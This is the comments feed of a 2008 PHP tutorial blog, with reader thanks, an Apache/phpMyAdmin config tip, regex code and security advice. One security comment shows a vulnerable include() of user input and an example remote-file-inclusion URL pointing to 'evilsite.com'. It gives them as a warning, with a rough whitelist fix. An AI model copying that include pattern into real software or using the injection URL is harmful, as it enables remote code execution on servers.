Devolio - Comments

UrsusArctosHorribilis: How to install Apache, MySQL and PHP (LAMP) in Ubuntu 8.04

nospam@example.com (UrsusArctosHorribilis) — Fri, 29 Aug 2008 23:34:20 -0400

Thanks. This got me started in no time at all. Greatly appreciated.

Tore: How to install Apache, MySQL and PHP (LAMP) in Ubuntu 7.10

nospam@example.com (Tore) — Fri, 29 Aug 2008 15:05:06 -0400

Wow! Thanks for a great guide. Everything worked and it was quick and easy. Almost to good to be true
Hugs and kisses from Sweden! /Tore

Joey: Data Filtering Using PHP's Filter Functions - Part one

nospam@example.com (Joey) — Thu, 28 Aug 2008 12:03:24 -0400

I encountered the same problem trying to do research on them. Glad it can be of some use.

Michael: Data Filtering Using PHP's Filter Functions - Part one

nospam@example.com (Michael) — Thu, 28 Aug 2008 09:03:54 -0400

Nice - thanks for this. I've been using some of these, but the official documentation is still a bit lacking.

Kaarel: Data Filtering Using PHP's Filter Functions - Part one

nospam@example.com (Kaarel) — Wed, 27 Aug 2008 07:51:28 -0400

Great info! Been developing php for soem time and had no clue of such functionality.

one.perfect.sunrise: 8 Practical PHP Regular Expressions

nospam@example.com (one.perfect.sunrise) — Tue, 26 Aug 2008 06:30:46 -0400

About "Validating Telephone Numbers":

$phone_number = '0893010144';
//$phone_number = '0893 010144';
//$phone_number = '0893 01 01 44';
//$phone_number = '+359893010144';
//$phone_number = '+359893 01 01 44';
//$phone_number = '(359) 893010144';
//$phone_number = '(+359) 893010144';
//$phone_number = '(+359) 893-01-01-44';
//$phone_number = '(+359) 893 010 144';
//$phone_number = '(+359) 893 01 01 44';
//$phone_number = '(+359) 893 010 144';
//$phone_number = '(+359)893010144';

$pattern = '/^$?\+?[0-9]{3}$?([0-9- ]){6,13}$/';

if (preg_match($pattern, $phone_number)) {
echo 'ok ...';
} else {
echo 'bad ...';
}

Try this. The max length of phone number and (spaces or dash) must be between 6 and 13 characters (all). You can change this length if you want ...

Joey: PHP Security - Part One

nospam@example.com (Joey) — Sun, 17 Aug 2008 03:02:59 -0400

@Gerd - That works fine for anything not requiring special chars.

@Allison - Agreed, prepared statements are one of the better ways to avoid sql injection (for the most part).

@Phillip - Hopefully nobody would ever include files like that, but I'll add it to the article. Thanks

@Drew - Nice catch, fixed. Thanks.

Drew Douglass: PHP Security - Part One

nospam@example.com (Drew Douglass) — Sun, 17 Aug 2008 02:15:08 -0400

"This example would strip out the b and a tags from the string"

This is incorrect. The above example would allow only the a and b tags.

Straight from the manual:http://us.php.net/strip-tags

Thought I would let you know, otherwise not bad advice for beginners.

Regards,

Drew

Phillip Long: PHP Security - Part One

nospam@example.com (Phillip Long) — Sat, 16 Aug 2008 22:13:33 -0400

Another huge php security issue is displaying/including file content.

For example,
$file = $POST['file'];/$_GET['file'];
include($file);
is a HUGE mistake, POST data can be forged, and a malicious script can me injected such as site.com/page.php?file=http://evilsite.com/evilscript.txt

a way around this would be to do a preg_match(/^(http:\/\/yoursite.com\/dir\/)/, $file)

Sorry if the code is not exact, I just scribbled it out here.

I find it is always best to sanitize all data from $_GET, $_POST, and $_COOKIE

Allison Nighswander: PHP Security - Part One

nospam@example.com (Allison Nighswander) — Sat, 16 Aug 2008 20:23:44 -0400

I think the best way to prevent sql injection is to use prepared statements.

Gerd: PHP Security - Part One

nospam@example.com (Gerd) — Sat, 16 Aug 2008 20:19:53 -0400

Just:
$var = preg_replace('/[^a-zA-Z0-9]/', '', $var)

I use this for simple GET/POST vars.

Robert James: How to install Apache, MySQL and PHP (LAMP) in Ubuntu 8.04

nospam@example.com (Robert James) — Fri, 01 Aug 2008 14:37:51 -0400

Thanks, very useful document.

Pakde Pakdoz: How to install Apache, MySQL and PHP (LAMP) in Ubuntu 7.10

nospam@example.com (Pakde Pakdoz) — Fri, 25 Jul 2008 14:42:29 -0400

Hi, to get PHPmyAdmin working, I make configuration on apache2.conf:

sudo nano /etc/apache2/apache2.conf

Scroll right to the bottom of the file that opens, and add:

# Enable PHPMyAdmin
Include /etc/phpmyadmin/apache.conf

Now save, exit, and type:

sudo /etc/init.d/apache2 restart

Graham: 8 Practical PHP Regular Expressions

nospam@example.com (Graham) — Sun, 20 Jul 2008 00:21:12 -0400

Just StumbleUpon'd this article, and it was very helpful. Even more helpful were your loyal readers and their comments. Definitely bookmark worthy. Thanks for your help!

mike: Understanding Classes and OOP

nospam@example.com (mike) — Fri, 18 Jul 2008 01:51:20 -0400

Good OOP intro..